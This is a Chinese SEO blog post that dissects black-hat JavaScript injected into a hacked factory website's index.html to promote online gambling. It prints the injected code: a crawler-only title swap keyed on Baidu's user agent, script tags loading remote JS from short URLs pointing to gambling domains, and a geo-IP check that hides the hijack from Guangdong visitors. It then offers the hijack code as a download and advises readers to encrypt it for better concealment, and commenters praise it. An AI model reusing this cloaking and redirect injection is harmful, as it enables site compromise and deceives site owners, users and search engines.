黑帽SEO技术鬼手经典之作,逆向分析一个被菠菜沦陷的正规站

释放双眼,带上耳机,听听看~!

直接入正题,贴上被入侵网站index.html里面head头部代码。

被入侵网站头部代码分析

我们看title标题部分,代码如下:

[reply]最新网上博彩娱乐_澳门线上开户平台_最新网上赌博网站大全
[/reply]

是不是看不懂。这个代码是Unicode编码的,我们用工具把Unicode编码成中文看下。

[reply]“最新网上博彩娱乐_澳门线上开户平台_最新网上赌博网站大全”
[/reply]

顺便把keywords关键词和description描述的Unicode编码转码一下吧。

[reply]

关键词:十大正规赌博网站坚持专业、最贴心的服务宗旨,每一位玩家都可以在这里接受顶级品牌的服务十大正规赌博网站所有细节都追求最完美的用户体验。

描述:网上十大正规赌博平台【www.js29118.com】,正规赌博网站有,正规十大赌博网站排名欢迎您,收录正规平台,正规十大赌博网站排名年度亚洲区重点推荐信誉博彩网上十大正规赌博平台。
[/reply]

现在看得懂鸟语了吧!
接下来继续看代码。
来了一个JS。
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf(“baidu”) == -1){document.title =”超冷、深冷、超深冷、超冷处理-东莞市有容超冷五金配件加工厂”}</script>

这个JS是判断来路的,如果不是百度来的就显示“超冷、深冷、超深冷、超冷处理-东莞市有容超冷五金配件加工厂”。如果是的那就显示Unicode编码转码的

[reply]“最新网上博彩娱乐_澳门线上开户平台_最新网上赌博网站大全”。[/reply]

下面还是JS。

[reply]
<script language=”javascript” src=”http://t.cn/RBAcEC8″></script>[/reply]

把网址复制到浏览器打开显示如下。

黑帽JS劫持代码分析

[reply]
此网址http://t.cn/RBAcEC8直接变成了https://www.bcdas8.com/dq.js,[/reply]

其实是一段JS,JS下面又有一个网址https://pv.sohu.com/cityjson?ie=utf-8,复制到浏览器中打开显示如下。

判断来路地区代码

终于有点眉目了。他自己的网站报毒于是生成一个短网址来欺骗搜索引擎,变成一个百度认可的短网址。这个网页中是执行一条JS,用来判断IP地区来路的。我是在东莞的IP,显示是广东省东莞市,如果你是其他地方他会显示其他地方。所以看到以上图片可能和你实际验证的时候有地域差别。这个判断来路的JS其实是搜狐提供的,他调用了。

接下来是这句代码<script>var sf=returnCitySN[“cname”]; if(sf.indexOf(“广东省”)>=0){window.location.href=”/indax.html”;}</script>

这个代码的意思是如果你的IP是广东省的那么页面直接跳转到indax.html,不是的直接运行下面的代码。

[reply]
<script language=”javascript” src=”http://t.cn/RBASXKi”></script>[/reply]

又是一个JS,把网址复制到浏览器中查看。

提交百度360搜索JS代码

这又是通过短段码伪装成信任网站的危险网站的JS,里面是百度和360推送的网址。目的就是发挥它的余热,临走之前再推送一次百度和360,并做了标记识别,知道是哪个网址来的。

[reply]https://769941.com/?88,[/reply]

?88是他的识别码,黑客自己设置的有一定对应关系的,用来统计来源的。下面的代码就没什么了的了。

简单总结一下。

1、此代码具有2重隐蔽性。第一重:正常直接访问不跳转,伪装成正常网站的标题。第二重:你是广东IP访问直接跳转到indax.html,这个是正常网页。如果站长是在广东,你根本发现不了,就算你是通过百度搜索去点击。

2、代码加入了地区判断验证和一般的有点区别。

3、代码用短网址过滤风险提示。

4、代码用Unicode编码来伪装自己。

5、代码进行了百度和360推送。

6、跳转加入了随机跳转,但写的网站都是同一个。

7、不足之处只做了百度来路的,其他搜索引擎的没做。

黑帽劫持JS代码打包下载地址链接:

许望上此处内容已经被作者隐藏,请输入验证码查看内容
验证码:
请关注本站微信公众号,回复“www.935la.com”,获取验证码。在微信里搜索“许望上”或者“a1027104365”或者微信扫描右侧二维码都可以关注本站微信公众号。

注:以上代码过于简单粗暴,伪装的不够隐蔽,可以参看下面推荐阅读文章,自行加密处理。

 

推荐阅读:

仅从黑帽SEO技术研究!黑帽变黑产,暗流涌动,瞬间起飞了

人已赞赏
SEO培训

什么事seo

2019-7-7 16:54:47

SEO培训

新网站seo优化,武汉SEO网站宣传公司哪家好

2019-7-15 19:32:47

33 条回复 A文章作者 M管理员
  1. zeuson

    因为文章中涉及到敏感词汇,所有需要回复才可以查看,请各位谅解。

  2. zeuson

    不错,分析的很透彻。博主辛苦了

  3. zeuson

    这种黑帽做法牛逼,普通人玩不转呀。

  4. zeuson

    厉害,讲的很好

  5. zeuson

    厉害,讲的很好

  6. zeuson

    需自行车在三十

  7. zeuson

    沙发上

  8. zeuson

    来学些

  9. zeuson

    看看大神的技术

  10. zeuson

    回复了哈哈哈

  11. zeuson

    牛逼!大赞

  12. zeuson

    来了

  13. zeuson

    好好好牛的

  14. zeuson

    终于明白了这个黑帽手法了,花了我一个小时仔细来研究。

  15. zeuson

    是我需要的

  16. zeuson

    为什么看不到

    • zeuson

      回复、刷新就可以看到了

  17. zeuson

    研究下新技术,学习。

  18. zeuson

    我要看到 内容

  19. zeuson

    辛苦了博主

  20. zeuson

    牛皮

  21. zeuson

    学习学习 谢谢大佬

  22. zeuson

    有意向购买

  23. zeuson

    恢复一下

  24. zeuson

    挺好的

  25. zeuson

    牛牛牛

  26. zeuson

    学习

  27. zeuson

    再试一次

  28. zeuson

    可以

  29. zeuson

    666可以的

  30. zeuson

    瞻仰大神

  31. zeuson

    66666666666666666哈

  32. zeuson

    瞻仰大神

个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索